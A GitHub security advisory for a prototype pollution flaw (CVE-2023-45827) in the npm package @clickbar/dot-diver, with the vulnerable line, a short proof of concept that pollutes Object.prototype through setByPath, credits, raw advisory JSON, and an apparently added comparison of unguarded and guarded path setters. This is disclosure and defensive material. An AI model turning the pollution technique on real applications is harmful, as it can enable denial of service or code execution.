GHSA-9W5F-MW3P-PJ47

Vulnerability from github – Published: 2023-11-03 19:03 – Updated: 2023-11-06 19:34
Summary
Prototype Pollution(PP) vulnerability in setByPath
Details

Summary

There is a Prototype Pollution (PP) vulnerability in dot-diver. It can lead to RCE.

Details

```javascript
// https://github.com/clickbar/dot-diver/tree/main/src/index.ts:277

// eslint-disable-next-line @typescript-eslint/no-unsafe-member-access
objectToSet[lastKey] = value
```

In this code, there is no validation against Prototype Pollution.

PoC

```javascript
import { getByPath, setByPath } from '@clickbar/dot-diver'

console.log({}.polluted); // undefined
setByPath({},'constructor.prototype.polluted', 'foo');
console.log({}.polluted); // foo
```
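The missing validation described under Details can be seen by running the PoC's path through an unguarded path setter and a guarded one. This is an added example, not dot-diver's code or its fix; `setByPathUnsafe`, `setByPathSafe`, `BLOCKED_KEYS` and `comparePathSetters` are hypothetical names, and the inputs are constructed.

```javascript
// Added illustration: hypothetical helpers, not dot-diver's implementation or its patch.
// Path segments that lead from a plain object to a shared prototype.
const BLOCKED_KEYS = new Set(['__proto__', 'constructor', 'prototype']);

// Unguarded setter: walks whatever the path names, inherited properties included.
function setByPathUnsafe(target, path, value) {
  const keys = path.split('.');
  const lastKey = keys.pop();
  let node = target;
  for (const key of keys) node = node[key];
  node[lastKey] = value; // same shape as the flagged assignment
}

// Guarded setter: rejects prototype-reaching segments, descends only via own properties.
function setByPathSafe(target, path, value) {
  const keys = path.split('.');
  if (keys.some((key) => BLOCKED_KEYS.has(key))) {
    throw new TypeError(`unsafe segment in path "${path}"`);
  }
  const lastKey = keys.pop();
  let node = target;
  for (const key of keys) {
    if (!Object.prototype.hasOwnProperty.call(node, key)) node[key] = {};
    node = node[key];
    if (node === null || typeof node !== 'object') {
      throw new TypeError(`cannot descend into non-object at "${key}"`);
    }
  }
  node[lastKey] = value;
}

// Runs the PoC path through both setters, cleans up, and reports what each one did.
function comparePathSetters() {
  const report = {};
  setByPathUnsafe({}, 'constructor.prototype.pollutedDemo', 'foo');
  report.unsafePolluted = {}.pollutedDemo === 'foo';
  delete Object.prototype.pollutedDemo;
  try {
    setByPathSafe({}, 'constructor.prototype.pollutedDemo', 'foo');
    report.safeRejected = false;
  } catch (err) {
    report.safeRejected = err instanceof TypeError;
  }
  report.safePolluted = 'pollutedDemo' in {};
  const settings = {};
  setByPathSafe(settings, 'a.b.c', 1);
  report.nestedValue = settings.a.b.c;
  return report;
}
```

The blocklist also rejects legitimate data keys named `constructor` or `prototype`; a setter that must accept them needs the own-property check plus a prototype-free container such as `Object.create(null)` instead.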

Impact

This is a Prototype Pollution (PP) vulnerability, and it can lead to DoS, RCE, etc.

Credits

Team : NodeBoB

최지혁 ( Jihyeok Choi )

이동하 ( Lee Dong Ha of ZeroPointer Lab )

강성현 ( kang seonghyeun )

박성진 ( sungjin park )

김찬호 ( Chanho Kim )

이수영 ( Lee Su Young )

김민욱 ( MinUk Kim )


{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "@clickbar/dot-diver"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "1.0.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2023-45827"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1321"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2023-11-03T19:03:40Z",
    "nvd_published_at": "2023-11-06T18:15:08Z",
    "severity": "HIGH"
  },
  "details": "### Summary\nThere is a Prototype Pollution(PP) vulnerability in dot-diver. It can leads to RCE.\n\n### Details\n```javascript\n//https://github.com/clickbar/dot-diver/tree/main/src/index.ts:277\n\n// eslint-disable-next-line @typescript-eslint/no-unsafe-member-access\n  objectToSet[lastKey] = value\n```\nIn this code, there is no validation for Prototpye Pollution.\n\n### PoC\n```javascript\nimport { getByPath, setByPath } from \u0027@clickbar/dot-diver\u0027\n\nconsole.log({}.polluted); // undefined\nsetByPath({},\u0027constructor.prototype.polluted\u0027, \u0027foo\u0027);\nconsole.log({}.polluted); // foo\n```\n\n### Impact\nIt is Prototype Pollution(PP) and it can leads to Dos, RCE, etc.\n\n### Credits\nTeam : NodeBoB\n\n\ucd5c\uc9c0\ud601   ( Jihyeok Choi )\n\n\uc774\ub3d9\ud558\u2003( Lee Dong Ha of ZeroPointer Lab )\n\n\uac15\uc131\ud604 \u00a0\u00a0\u00a0( kang seonghyeun )\n\n\ubc15\uc131\uc9c4\u00a0\u00a0\u00a0 ( sungjin park )\n\n\uae40\ucc2c\ud638\u00a0\u00a0\u00a0 ( Chanho Kim )\n\n\uc774\uc218\uc601 \u00a0\u00a0\u00a0( Lee Su Young )\n\n\uae40\ubbfc\uc6b1 \u00a0\u00a0\u00a0( MinUk Kim )\n",
  "id": "GHSA-9w5f-mw3p-pj47",
  "modified": "2023-11-06T19:34:19Z",
  "published": "2023-11-03T19:03:40Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/clickbar/dot-diver/security/advisories/GHSA-9w5f-mw3p-pj47"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-45827"
    },
    {
      "type": "WEB",
      "url": "https://github.com/clickbar/dot-diver/commit/9790834cf4c2bca75db00e588e58056dacaf602f"
    },
    {
      "type": "WEB",
      "url": "https://github.com/clickbar/dot-diver/commit/98daf567390d816fd378ec998eefe2e97f293d5a"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/clickbar/dot-diver"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Prototype Pollution(PP) vulnerability in setByPath"
}

